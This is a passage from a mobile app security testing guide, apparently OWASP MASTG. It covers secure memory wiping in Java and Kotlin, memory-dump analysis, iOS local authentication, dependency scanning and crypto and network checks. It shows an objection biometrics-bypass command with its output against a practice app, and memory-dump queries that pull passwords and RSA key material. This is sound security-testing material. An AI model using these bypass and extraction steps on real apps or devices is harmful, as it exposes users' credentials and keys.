byte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n Arrays.fill(secret, (byte) 0);\n }\n}\n
Example in Kotlin:
val secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n Arrays.fill(secret, 0.toByte())\n }\n}\n
This doesn't, however, guarantee that the content will be overwritten at runtime. To optimize the bytecode, the compiler will analyze and decide not to overwrite data because it will not be used afterwards (i.e., it is an unnecessary operation). Even if the code is in the compiled DEX, the optimization may occur during the just-in-time or ahead-of-time compilation in the VM.
There is no silver bullet for this problem because different solutions have different consequences. For example, you may perform additional calculations (e.g., XOR the data into a dummy buffer), but you'll have no way to know the extent of the compiler's optimization analysis. On the other hand, using the overwritten data outside the compiler's scope (e.g., serializing it in a temp file) guarantees that it will be overwritten but obviously impacts performance and maintenance.
Then, using Arrays.fill
to overwrite the data is a bad idea because the method is an obvious hooking target (see the chapter \"Tampering and Reverse Engineering on Android\" for more details).
The final issue with the above example is that the content was overwritten with zeroes only. You should try to overwrite critical objects with random data or content from non-critical objects. This will make it really difficult to construct scanners that can identify sensitive data on the basis of its management.
Below is an improved version of the previous example:
Example in Java:
byte[] nonSecret = somePublicString.getBytes(\"ISO-8859-1\");\nbyte[] secret = null;\ntry{\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (int i = 0; i < secret.length; i++) {\n secret[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(secret);\n out.flush();\n out.close();\n }\n}\n
Example in Kotlin:
val nonSecret: ByteArray = somePublicString.getBytes(\"ISO-8859-1\")\nval secret: ByteArray? = null\ntry {\n //get or generate the secret, do work with it, make sure you make no local copies\n} finally {\n if (null != secret) {\n for (i in secret.indices) {\n secret[i] = nonSecret[i % nonSecret.size]\n }\n\n val out = FileOutputStream(\"/dev/null\")\n out.write(secret)\n out.flush()\n out.close()\n }\n}\n
For more information, take a look at Securely Storing Sensitive Data in RAM.
In the \"Static Analysis\" section, we mentioned the proper way to handle cryptographic keys when you are using AndroidKeyStore
or SecretKey
.
For a better implementation of SecretKey
, look at the SecureSecretKey
class below. Although the implementation is probably missing some boilerplate code that would make the class compatible with SecretKey
, it addresses the main security concerns:
Example in Java:
public class SecureSecretKey implements javax.crypto.SecretKey, Destroyable {\n private byte[] key;\n private final String algorithm;\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n public SecureSecretKey(final byte[] key, final String algorithm) {\n this.key = key.clone();\n this.algorithm = algorithm;\n }\n\n public String getAlgorithm() {\n return this.algorithm;\n }\n\n public String getFormat() {\n return \"RAW\";\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n public byte[] getEncoded() {\n if(null == key){\n throw new NullPointerException();\n }\n\n return key.clone();\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory.*/\n public void destroy() {\n if (isDestroyed()) {\n return;\n }\n\n byte[] nonSecret = new String(\"RuntimeException\").getBytes(\"ISO-8859-1\");\n for (int i = 0; i < key.length; i++) {\n key[i] = nonSecret[i % nonSecret.length];\n }\n\n FileOutputStream out = new FileOutputStream(\"/dev/null\");\n out.write(key);\n out.flush();\n out.close();\n\n this.key = null;\n System.gc();\n }\n\n public boolean isDestroyed() {\n return key == null;\n }\n }\n
Example in Kotlin:
class SecureSecretKey(key: ByteArray, algorithm: String) : SecretKey, Destroyable {\n private var key: ByteArray?\n private val algorithm: String\n override fun getAlgorithm(): String {\n return algorithm\n }\n\n override fun getFormat(): String {\n return \"RAW\"\n }\n\n /** Returns a copy of the key.\n * Make sure to clear the returned byte array when no longer needed.\n */\n override fun getEncoded(): ByteArray {\n if (null == key) {\n throw NullPointerException()\n }\n return key!!.clone()\n }\n\n /** Overwrites the key with dummy data to ensure this copy is no longer present in memory. */\n override fun destroy() {\n if (isDestroyed) {\n return\n }\n val nonSecret: ByteArray = String(\"RuntimeException\").toByteArray(charset(\"ISO-8859-1\"))\n for (i in key!!.indices) {\n key!![i] = nonSecret[i % nonSecret.size]\n }\n val out = FileOutputStream(\"/dev/null\")\n out.write(key)\n out.flush()\n out.close()\n key = null\n System.gc()\n }\n\n override fun isDestroyed(): Boolean {\n return key == null\n }\n\n /** Constructs SecureSecretKey instance out of a copy of the provided key bytes.\n * The caller is responsible of clearing the key array provided as input.\n * The internal copy of the key can be cleared by calling the destroy() method.\n */\n init {\n this.key = key.clone()\n this.algorithm = algorithm\n }\n}\n
Secure user-provided data is the final secure information type usually found in memory. This is often managed by implementing a custom input method, for which you should follow the recommendations given here. However, Android allows information to be partially erased from EditText
buffers via a custom Editable.Factory
.
EditText editText = ...; // point your variable to your EditText instance\nEditText.setEditableFactory(new Editable.Factory() {\n public Editable newEditable(CharSequence source) {\n ... // return a new instance of a secure implementation of Editable.\n }\n});\n
Refer to the SecureSecretKey
example above for an example Editable
implementation. Note that you will be able to securely handle all copies made by editText.getText
if you provide your factory. You can also try to overwrite the internal EditText
buffer by calling editText.setText
, but there is no guarantee that the buffer will not have been copied already. If you choose to rely on the default input method and EditText
, you will have no control over the keyboard or other components that are used. Therefore, you should use this approach for semi-confidential information only.
In all cases, make sure that sensitive data in memory is cleared when a user signs out of the application. Finally, make sure that highly sensitive information is cleared out the moment an Activity or Fragment's onPause
event is triggered.
Note that this might mean that a user has to re-authenticate every time the application resumes.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#dynamic-analysis","title":"Dynamic Analysis","text":"Static analysis will help you identify potential problems, but it can't provide statistics about how long data has been exposed in memory, nor can it help you identify problems in closed-source dependencies. This is where dynamic analysis comes into play.
There are various ways to analyze the memory of a process, e.g. live analysis via a debugger/dynamic instrumentation and analyzing one or more memory dumps.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#retrieving-and-analyzing-a-memory-dump","title":"Retrieving and Analyzing a Memory Dump","text":"Whether you are using a rooted or a non-rooted device, you can dump the app's process memory with objection and Fridump. You can find a detailed explanation of this process in the section \"Memory Dump\", in the chapter \"Tampering and Reverse Engineering on Android\".
After the memory has been dumped (e.g. to a file called \"memory\"), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. For instance, if you're focusing on strings, it might be sufficient for you to execute the command strings
or rabin2 -zz
to extract those strings.
# using strings\n$ strings memory > strings.txt\n\n# using rabin2\n$ rabin2 -zz memory > strings.txt\n
Open strings.txt
in your favorite editor and dig through it to identify sensitive information.
However if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. See radare2's help on the search command (/?
) for more information and a list of options. The following shows only a subset of them:
$ r2 <name_of_your_dump_file>\n\n[0x00000000]> /?\nUsage: /[!bf] [arg] Search stuff (see 'e??search' for options)\n|Use io.va for searching in non virtual addressing spaces\n| / foo\\x00 search for string 'foo\\0'\n| /c[ar] search for crypto materials\n| /e /E.F/i match regular expression\n| /i foo search for string 'foo' ignoring case\n| /m[?][ebm] magicfile search for magic, filesystems or binary headers\n| /v[1248] value look for an `cfg.bigendian` 32bit value\n| /w foo search for wide string 'f\\0o\\0o\\0'\n| /x ff0033 search for hex string\n| /z min max search for strings of given size\n...\n
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#runtime-memory-analysis","title":"Runtime Memory Analysis","text":"Instead of dumping the memory to your host computer, you can alternatively use r2frida. With it, you can analyze and inspect the app's memory while it's running. For example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. When doing so, remember to prepend the search command (and any other r2frida specific commands) with a backslash :
after starting the session with r2 frida://usb//<name_of_your_app>
.
For more information, options and approaches, please refer to section \"In-Memory Search\" in the chapter \"Tampering and Reverse Engineering on Android\".
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0011/#explicitly-dumping-and-analyzing-the-java-heap","title":"Explicitly Dumping and Analyzing the Java Heap","text":"For rudimentary analysis, you can use Android Studio's built-in tools. They are on the Android Monitor tab. To dump memory, select the device and app you want to analyze and click Dump Java Heap. This will create a .hprof file in the captures directory, which is on the app's project path.
To navigate through class instances that were saved in the memory dump, select the Package Tree View in the tab showing the .hprof file.
For more advanced analysis of the memory dump, use the Eclipse Memory Analyzer Tool (MAT). It is available as an Eclipse plugin and as a standalone application.
To analyze the dump in MAT, use the hprof-conv platform tool, which comes with the Android SDK.
./hprof-conv memory.hprof memory-mat.hprof\n
MAT provides several tools for analyzing the memory dump. For example, the Histogram provides an estimate of the number of objects that have been captured from a given type, and the Thread Overview shows processes' threads and stack frames. The Dominator Tree provides information about keep-alive dependencies between objects. You can use regular expressions to filter the results these tools provide.
Object Query Language studio is a MAT feature that allows you to query objects from the memory dump with an SQL-like language. The tool allows you to transform simple objects by invoking Java methods on them, and it provides an API for building sophisticated tools on top of the MAT.
SELECT * FROM java.lang.String\n
In the example above, all String
objects present in the memory dump will be selected. The results will include the object's class, memory address, value, and retain count. To filter this information and see only the value of each string, use the following code:
SELECT toString(object) FROM java.lang.String object\n
Or
SELECT object.toString() FROM java.lang.String object\n
SQL supports primitive data types as well, so you can do something like the following to access the content of all char
arrays:
SELECT toString(arr) FROM char[] arr\n
Don't be surprised if you get results that are similar to the previous results; after all, String
and other Java data types are just wrappers around primitive data types. Now let's filter the results. The following sample code will select all byte arrays that contain the ASN.1 OID of an RSA key. This doesn't imply that a given byte array actually contains an RSA (the same byte sequence may be part of something else), but this is probable.
SELECT * FROM byte[] b WHERE toString(b).matches(\".*1\\.2\\.840\\.113549\\.1\\.1\\.1.*\")\n
Finally, you don't have to select whole objects. Consider an SQL analogy: classes are tables, objects are rows, and fields are columns. If you want to find all objects that have a \"password\" field, you can do something like the following:
SELECT password FROM \".*\" WHERE (null != password)\n
During your analysis, search for:
Repeating tests and memory dumps will help you obtain statistics about the length of data exposure. Furthermore, observing the way a particular memory segment (e.g., a byte array) changes may lead you to some otherwise unrecognizable sensitive data (more on this in the \"Remediation\" section below).
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/","title":"Testing the Device-Access-Security Policy","text":""},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#overview","title":"Overview","text":"Apps that process or query sensitive information should run in a trusted and secure environment. To create this environment, the app can check the device for the following:
To test the device-access-security policy that the app enforces, a written copy of the policy must be provided. The policy should define available checks and their enforcement. For example, one check could require that the app run only on Android 6.0 (API level 23) or a more recent version, closing the app or displaying a warning if the Android version is less than 6.0.
Check the source code for functions that implement the policy and determine whether it can be bypassed.
You can implement checks on the Android device by querying Settings.Secure for system preferences. Device Administration API offers techniques for creating applications that can enforce password policies and device encryption.
"},{"location":"MASTG/tests/android/MASVS-STORAGE/MASTG-TEST-0012/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis depends on the checks enforced by the app and their expected behavior. If the checks can be bypassed, they must be validated.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/","title":"Testing Local Authentication","text":""},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#overview","title":"Overview","text":"The usage of frameworks in an app can be detected by analyzing the app binary's list of shared dynamic libraries. This can be done by using otool:
otool -L <AppName>.app/<AppName>\n
If LocalAuthentication.framework
is used in an app, the output will contain both of the following lines (remember that LocalAuthentication.framework
uses Security.framework
under the hood):
/System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication\n/System/Library/Frameworks/Security.framework/Security\n
If Security.framework
is used, only the second one will be shown.
It is important to remember that the LocalAuthentication framework is an event-based procedure and as such, should not be the sole method of authentication. Though this type of authentication is effective on the user-interface level, it is easily bypassed through patching or instrumentation. Therefore, it is best to use the keychain service method, which means you should:
kSecAccessControlBiometryCurrentSet
(before iOS 11.3 kSecAccessControlTouchIDCurrentSet
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the keychain item. Whenever the user adds a fingerprint or facial representation to the device, it will automatically invalidate the entry in the Keychain. This makes sure that the keychain item can only ever be unlocked by users that were enrolled when the item was added to the keychain.kSecAccessControlBiometryAny
(before iOS 11.3 kSecAccessControlTouchIDAny
). This will make sure that a user needs to authenticate with biometrics (e.g. Face ID or Touch ID) before accessing the data in the Keychain entry. The Keychain entry will survive any (re-)enrolling of new fingerprints or facial representation. This can be very convenient if the user has a changing fingerprint. However, it also means that attackers, who are somehow able to enroll their fingerprints or facial representations to the device, can now access those entries as well.kSecAccessControlUserPresence
can be used as an alternative. This will allow the user to authenticate through a passcode if the biometric authentication no longer works. This is considered to be weaker than kSecAccessControlBiometryAny
since it is much easier to steal someone's passcode entry by means of shoulder surfing than it is to bypass the Touch ID or Face ID service.kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
or the kSecAttrAccessibleWhenPasscodeSet
protection class is set when the SecAccessControlCreateWithFlags
method is called. Note that the ...ThisDeviceOnly
variant will make sure that the keychain item is not synchronized with other iOS devices.Note, a data protection class specifies the access methodology used to secure the data. Each class uses different policies to determine when the data is accessible.
"},{"location":"MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064/#dynamic-analysis","title":"Dynamic Analysis","text":"Objection Biometrics Bypass can be used to bypass LocalAuthentication. Objection uses Frida to instrument the evaluatePolicy
function so that it returns True
even if authentication was not successfully performed. Use the ios ui biometrics_bypass
command to bypass the insecure biometric authentication. Objection will register a job, which will replace the evaluatePolicy
result. It will work in both Swift and Objective-C implementations.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass\n(agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable\n...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # (agent) [3mhtws9x47q] Localized Reason for auth requirement: Please authenticate yourself\n(agent) [3mhtws9x47q] OS authentication response: false\n(agent) [3mhtws9x47q] Marking OS response as True instead\n(agent) [3mhtws9x47q] Biometrics bypass hook complete\n
If vulnerable, the module will automatically bypass the login form.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/","title":"Testing Object Persistence","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0079/#static-analysis","title":"Static Analysis","text":"All different flavors of object persistence share the following concerns:
There are several ways to perform dynamic analysis:
First see whether there is an update mechanism at all: if it is not yet present, it might mean that users cannot be forced to update. If the mechanism is present, see whether it enforces \"always latest\" and whether that is indeed in line with the business strategy. Otherwise check if the mechanism supports updating to a given version. Make sure that every entry of the application goes through the updating mechanism in order to ensure that the update-mechanism cannot be bypassed.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0080/#dynamic-analysis","title":"Dynamic analysis","text":"In order to test for proper updating: try downloading an older version of the application with a security vulnerability, either by a release from the developers or by using a third party app-store. Next, verify whether or not you can continue to use the application without updating it. If an update prompt is given, verify if you can still use the application by canceling the prompt or otherwise circumventing it through normal application usage. This includes validating whether the backend will stop calls to vulnerable backends and/or whether the vulnerable app-version itself is blocked by the backend. Finally, see if you can play with the version number of a man-in-the-middled app and see how the backend responds to this (and if it is recorded at all for instance).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/","title":"Checking for Weaknesses in Third Party Libraries","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#detecting-vulnerabilities-of-third-party-libraries","title":"Detecting vulnerabilities of third party libraries","text":"In order to ensure that the libraries used by the apps are not carrying vulnerabilities, one can best check the dependencies installed by CocoaPods or Carthage.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#swift-package-manager","title":"Swift Package Manager","text":"In case Swift Package Manager is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities:
First, at the root of the project, where the Package.swift file is located, type
swift build\n
Next, check the file Package.resolved for the actual versions used and inspect the given libraries for known vulnerabilities.
You can utilize the OWASP Dependency-Check's experimental Swift Package Manager Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's Package.swift file and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Package.swift\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#cocoapods","title":"CocoaPods","text":"In case CocoaPods is used for managing third party dependencies, the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Podfile is located, execute the following commands:
sudo gem install cocoapods\npod install\n
Next, now that the dependency tree has been built, you can create an overview of the dependencies and their versions by running the following commands:
sudo gem install cocoapods-dependencies\npod dependencies\n
The result of the steps above can now be used as input for searching different vulnerability feeds for known vulnerabilities.
Note:
You can utilize the OWASP Dependency-Check's experimental CocoaPods Analyzer to identify the Common Platform Enumeration (CPE) naming scheme of all dependencies and any corresponding Common Vulnerability and Exposure (CVE) entries. Scan the application's *.podspec and/or Podfile.lock files and generate a report of known vulnerable libraries with the following command:
dependency-check --enableExperimental --out . --scan Podfile.lock\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#carthage","title":"Carthage","text":"In case Carthage is used for third party dependencies, then the following steps can be taken to analyze the third party libraries for vulnerabilities.
First, at the root of the project, where the Cartfile is located, type
brew install carthage\ncarthage update --platform iOS\n
Next, check the Cartfile.resolved for actual versions used and inspect the given libraries for known vulnerabilities.
Note, at the time of writing this chapter, there is no automated support for Carthage based dependency analysis known to the authors. At least, this feature was already requested for the OWASP DependencyCheck tool but not yet implemented (see the GitHub issue).
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#discovered-library-vulnerabilities","title":"Discovered library vulnerabilities","text":"When a library is found to contain vulnerabilities, then the following reasoning applies:
In case frameworks are added manually as linked libraries:
In the case of copy-pasted sources: search the header files (in case of using Objective-C) and otherwise the Swift files for known method names for known libraries.
Next, note that for hybrid applications, you will have to check the JavaScript dependencies with RetireJS. Similarly for Xamarin, you will have to check the C# dependencies.
Last, if the application is a high-risk application, you will end up vetting the library manually. In that case there are specific requirements for native code, which are similar to the requirements established by the MASVS for the application as a whole. Next to that, it is good to vet whether all best practices for software engineering are applied.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0085/#dynamic-analysis","title":"Dynamic Analysis","text":"The dynamic analysis of this section comprises two parts: the actual license verification and checking which libraries are involved in case of missing sources.
It needs to be validated whether the copyrights of the licenses have been adhered to. This often means that the application should have an about
or EULA
section in which the copyright statements are noted as required by the license of the third party library.
When performing app analysis, it is important to also analyze the app dependencies (usually in form of libraries or so-called iOS Frameworks) and ensure that they don't contain any vulnerabilities. Even when you don't have the source code, you can still identify some of the app dependencies using tools like objection, MobSF or the otool -L
command. Objection is the recommended tool, since it provides the most accurate results and it is easy to use. It contains a module to work with iOS Bundles, which offers two commands: list_bundles
and list_frameworks
.
The list_bundles
command lists all of the application\u2019s bundles that are not related to Frameworks. The output contains executable name, bundle id, version of the library and path to the library.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_bundles\nExecutable Bundle Version Path\n------------ ----------------------------------------- --------- -------------------------------------------\nDVIA-v2 com.highaltitudehacks.DVIAswiftv2.develop 2 ...-1F0C-4DB1-8C39-04ACBFFEE7C8/DVIA-v2.app\nCoreGlyphs com.apple.CoreGlyphs 1 ...m/Library/CoreServices/CoreGlyphs.bundle\n
The list_frameworks
command lists all of the application\u2019s bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/","title":"Memory Corruption Bugs","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#static-analysis","title":"Static Analysis","text":"Are there native code parts? If so: check for the given issues in the general memory corruption section. Native code is a little harder to spot when compiled. If you have the sources then you can see that C files use .c source files and .h header files and C++ uses .cpp files and .h files. This is a little different from the .swift and the .m source files for Swift and Objective-C. These files can be part of the sources, or part of third party libraries, registered as frameworks and imported through various tools, such as Carthage, the Swift Package Manager or Cocoapods.
For any managed code (Objective-C / Swift) in the project, check the following items:
free
is called twice for a given region instead of once.UnsafePointer
can be managed wrongly, which will allow for various memory corruption issues.Unmanaged
manually, leading to wrong counter numbers and a too late/too soon release.A great talk is given on this subject at Realm academy and a nice tutorial to see what is actually happening is provided by Ray Wenderlich on this subject.
Please note that with Swift 5 you can only deallocate full blocks, which means the playground has changed a bit.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0086/#dynamic-analysis","title":"Dynamic Analysis","text":"There are various tools provided which help to identify memory bugs within Xcode, such as the Debug Memory graph introduced in Xcode 8 and the Allocations and Leaks instrument in Xcode.
Next, you can check whether memory is freed too fast or too slow by enabling NSAutoreleaseFreedObjectCheckEnabled
, NSZombieEnabled
, NSDebugEnabled
in Xcode while testing the application.
There are various well written explanations which can help with taking care of memory management. These can be found in the reference list of this chapter.
"},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/","title":"Make Sure That Free Security Features Are Activated","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CODE/MASTG-TEST-0087/#static-analysis","title":"Static Analysis","text":"You can use radare2 to check the binary security features.
Let's use the Damn Vulnerable iOS App DVIA v1 as an example. Open its main binary with radare2:
r2 DamnVulnerableIOSApp\n
And run the following commands:
[0x1000180c8]> i~pic,canary\ncanary true\npic true\n
[0x1000180c8]> is~release,retain\n124 0x002951e0 0x1000891e0 LOCAL FUNC 0 imp.dispatch_release\n149 0x00294e80 0x100088e80 LOCAL FUNC 0 imp.objc_autorelease\n150 0x00294e8c 0x100088e8c LOCAL FUNC 0 imp.objc_autoreleasePoolPop\n151 0x00294e98 0x100088e98 LOCAL FUNC 0 imp.objc_autoreleasePoolPush\n152 0x00294ea4 0x100088ea4 LOCAL FUNC 0 imp.objc_autoreleaseReturnValue\n165 0x00294f40 0x100088f40 LOCAL FUNC 0 imp.objc_release\n167 0x00294f58 0x100088f58 LOCAL FUNC 0 imp.objc_retainAutorelease\n168 0x00294f64 0x100088f64 LOCAL FUNC 0 imp.objc_retainAutoreleaseReturnValue\n169 0x00294f70 0x100088f70 LOCAL FUNC 0 imp.objc_retainAutoreleasedReturnValue\n
All the features are enabled in these examples:
PIE (Position Independent Executable): indicated by the flag pic true
.
MH_EXECUTE
), not to dynamic libraries (MH_DYLIB
).Stack Canary: indicated by the flag canary true
.
ARC (Automatic Reference Counting): indicated by symbols such as objc_autorelease
or objc_retainAutorelease
.
These checks can be performed dynamically using objection. Here's one example:
com.yourcompany.PPClient on (iPhone: 13.2.3) [usb] # ios info binary\nName Type Encrypted PIE ARC Canary Stack Exec RootSafe\n-------------------- ------- ----------- ----- ----- -------- ------------ ----------\nPayPal execute True True True True False False\nCardinalMobile dylib False False True True False False\nFraudForce dylib False False True True False False\n...\n
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/","title":"Verifying the Configuration of Cryptographic Standard Algorithms","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#static-analysis","title":"Static Analysis","text":"For each of the libraries that are used by the application, the used algorithms and cryptographic configurations need to be verified to make sure they are not deprecated and used correctly.
Pay attention to how-to-be-removed key-holding datastructures and plain-text data structures are defined. If the keyword let
is used, then you create an immutable structure which is harder to wipe from memory. Make sure that it is part of a parent structure which can be easily removed from memory (e.g. a struct
that lives temporally).
Ensure that the best practices outlined in the \"Cryptography for Mobile Apps\" chapter are followed. Look at insecure and deprecated algorithms and common configuration issues.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0061/#commoncryptor","title":"CommonCryptor","text":"If the app uses standard cryptographic implementations provided by Apple, the easiest way to determine the status of the related algorithm is to check for calls to functions from CommonCryptor
, such as CCCrypt
and CCCryptorCreate
. The source code contains the signatures of all functions of CommonCryptor.h. For instance, CCCryptorCreate
has following signature:
CCCryptorStatus CCCryptorCreate(\n CCOperation op, /* kCCEncrypt, etc. */\n CCAlgorithm alg, /* kCCAlgorithmDES, etc. */\n CCOptions options, /* kCCOptionPKCS7Padding, etc. */\n const void *key, /* raw key material */\n size_t keyLength,\n const void *iv, /* optional initialization vector */\n CCCryptorRef *cryptorRef); /* RETURNED */\n
You can then compare all the enum
types to determine which algorithm, padding, and key material is used. Pay attention to the keying material: the key should be generated securely - either using a key derivation function or a random-number generation function. Note that functions which are noted in chapter \"Cryptography for Mobile Apps\" as deprecated, are still programmatically supported. They should not be used.
Given the continuous evolution of all third party libraries, this should not be the place to evaluate each library in terms of static analysis. Still there are some points of attention:
There are various keywords to look for: check the libraries mentioned in the overview and static analysis of the section \"Verifying the Configuration of Cryptographic Standard Algorithms\" for which keywords you can best check on how keys are stored.
Always make sure that:
Check also the list of common cryptographic configuration issues.
Most of the recommendations for static analysis can already be found in chapter \"Testing Data Storage for iOS\". Next, you can read up on it at the following pages:
Hook cryptographic methods and analyze the keys that are being used. Monitor file system access while cryptographic operations are being performed to assess where key material is written to or read from.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/","title":"Testing Random Number Generation","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#static-analysis","title":"Static Analysis","text":"In Swift, the SecRandomCopyBytes
API is defined as follows:
func SecRandomCopyBytes(_ rnd: SecRandomRef?,\n _ count: Int,\n _ bytes: UnsafeMutablePointer<UInt8>) -> Int32\n
The Objective-C version is
int SecRandomCopyBytes(SecRandomRef rnd, size_t count, uint8_t *bytes);\n
The following is an example of the APIs usage:
int result = SecRandomCopyBytes(kSecRandomDefault, 16, randomBytes);\n
Note: if other mechanisms are used for random numbers in the code, verify that these are either wrappers around the APIs mentioned above or review them for their secure-randomness. Often this is too hard, which means you can best stick with the implementation above.
"},{"location":"MASTG/tests/ios/MASVS-CRYPTO/MASTG-TEST-0063/#dynamic-analysis","title":"Dynamic Analysis","text":"If you want to test for randomness, you can try to capture a large set of numbers and check with Burp's sequencer plugin to see how good the quality of the randomness is.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/","title":"Testing Data Encryption on the Network","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#overview","title":"Overview","text":"All the presented cases must be carefully analyzed as a whole. For example, even if the app does not permit cleartext traffic in its Info.plist, it might actually still be sending HTTP traffic. That could be the case if it's using a low-level API (for which ATS is ignored) or a badly configured cross-platform framework.
IMPORTANT: You should apply these tests to the app main code but also to any app extensions, frameworks or Watch apps embedded within the app as well.
For more information refer to the article \"Preventing Insecure Network Connections\" and \"Fine-tune your App Transport Security settings\" in the Apple Developer Documentation.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-network-requests-over-secure-protocols","title":"Testing Network Requests over Secure Protocols","text":"First, you should identify all network requests in the source code and ensure that no plain HTTP URLs are used. Make sure that sensitive information is sent over secure channels by using URLSession
(which uses the standard URL Loading System from iOS) or Network
(for socket-level communication using TLS and access to TCP and UDP).
Identify the network APIs used by the app and see if it uses any low-level networking APIs.
Apple Recommendation: Prefer High-Level Frameworks in Your App: \"ATS doesn\u2019t apply to calls your app makes to lower-level networking interfaces like the Network framework or CFNetwork. In these cases, you take responsibility for ensuring the security of the connection. You can construct a secure connection this way, but mistakes are both easy to make and costly. It\u2019s typically safest to rely on the URL Loading System instead\" (see source).
If the app uses any low-level APIs such as Network
or CFNetwork
, you should carefully investigate if they are being used securely. For apps using cross-platform frameworks (e.g. Flutter, Xamarin, ...) and third party frameworks (e.g. Alamofire) you should analyze if they're being configured and used securely according to their best practices.
Make sure that the app:
These checks are indicative; we cannot name specific APIs since every app might use a different framework. Please use this information as a reference when inspecting the code.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-for-cleartext-traffic","title":"Testing for Cleartext Traffic","text":"Ensure that the app is not allowing cleartext HTTP traffic. Since iOS 9.0 cleartext HTTP traffic is blocked by default (due to App Transport Security (ATS)) but there are multiple ways in which an application can still send it:
NSAllowsArbitraryLoads
attribute to true
(or YES
) on NSAppTransportSecurity
in the app's Info.plist
.Info.plist
Check that NSAllowsArbitraryLoads
is not set to true
globally or for any domain.
